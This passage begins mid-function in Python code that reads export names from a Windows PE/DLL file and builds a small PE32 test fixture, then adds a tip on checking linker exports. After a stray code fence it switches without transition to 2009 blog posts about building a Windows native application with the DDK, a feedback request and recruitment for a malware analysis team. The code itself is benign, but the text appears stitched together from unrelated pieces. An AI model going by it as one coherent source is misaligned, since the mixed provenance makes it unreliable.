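    export_rva = struct.unpack_from("<I", image, opt + (0x60 if magic == 0x10B else 0x70))[0]
    if export_rva == 0:
        return []          # no export directory: an EXE, or a DLL built without exports
    sections = []
    for i in range(nsections):
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", image, opt + opt_size + i * 40 + 8)
        sections.append((va, raw, max(vsize, rawsize)))
    edir = rva_to_offset(sections, export_rva)
    nnames, _, names_rva = struct.unpack_from("<III", image, edir + 24)   # NumberOfNames, AddressOfNames
    table, names = rva_to_offset(sections, names_rva), []
    for i in range(nnames):
        off = rva_to_offset(sections, struct.unpack_from("<I", image, table + 4 * i)[0])
        names.append(image[off:image.index(b"\0", off)].decode("ascii"))
    return names

def build_sample_image(names):
    """Constructed fixture, not a loadable DLL: a minimal PE32 whose only section is an export table."""
    sec_rva, sec_raw, n = 0x1000, 0x200, len(names)
    funcs_rva, names_rva = sec_rva + 0x28, sec_rva + 0x28 + 4 * n
    ords_rva, str_rva = names_rva + 4 * n, names_rva + 6 * n
    strings, name_rvas = b"mylib.dll\0", []
    for name in names:
        name_rvas.append(str_rva + len(strings))
        strings += name.encode("ascii") + b"\0"
    body = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, str_rva, 1, n, n, funcs_rva, names_rva, ords_rva)
    body += struct.pack("<%dI" % n, *range(0x1100, 0x1100 + n))      # placeholder code RVAs
    body += struct.pack("<%dI" % n, *name_rvas) + struct.pack("<%dH" % n, *range(n)) + strings
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                # e_lfanew -> PE signature
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 94 + struct.pack("<II", sec_rva, len(body)) + b"\0" * 120
    sec = b".edata\0\0" + struct.pack("<IIII", len(body), sec_rva, len(body), sec_raw) + b"\0" * 16
    head = dos + coff + opt + sec
    return head + b"\0" * (sec_raw - len(head)) + body
```

Run list_exports(open("mylib.dll", "rb").read()) on the real build output; if myFunc comes back as _myFunc@0 or not at all, the .def file was not picked up by the linker.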

    How to create a native application in C

    First, read this article. After that, you will only need a Windows DDK (Driver Development Kit).
    Then create two files in your working directory:
    makefile
    !INCLUDE $(NTMAKEENV)\makefile.def

    and
    sources
    TARGETNAME=myprog
    TARGETPATH=OBJ
    TARGETTYPE=PROGRAM
    SOURCES=myprog.c

    Now create your myprog.c file and don't forget to use only Native APIs. When you're done, open the checked or free Windows DDK build environment command prompt, go to your working folder and type the following command:

    build

    If everything went OK, you should have a new folder (such as objchk_wxp_x86 or objfree_wxp_x86) containing the exe. By the way, don't forget that you can't run it like a normal Windows application!

    Enjoy :)

    - Expertsec.com

    Thursday, January 8, 2009

    Feedback Time

    "Be it shitty or be it nice,
    send your feedback for it would be wise."

    We respect your time and value your response to our work; without it we are blind men swimming across the English Channel. We genuinely set our needs and requirements based on our interaction with you, our users.

    So, kindly email us at contact.fingers @ gmail.com with any reports, advice, requirements, compliments, etc. Be it good or be it bad, do contact us.

    - EF

    Wednesday, January 7, 2009

    Malware Analysis Team: CastleCops Volunteers Invited

    Rajdeep has left the team due to personal reasons. He was the lead of the user-base section of malware analysis: running the forum, welcoming the user base, collecting malware information and so on. We now need a new person to fill the position, and we are looking for someone with prior experience of doing the same.

    Since CastleCops has closed recently, we also extend a warm welcome to the CastleCops volunteers. If you would like to do something similar, or something different, we would like to work with you and help you in the process. Kindly contact us at contact.fingers @ gmail.com.

    - EF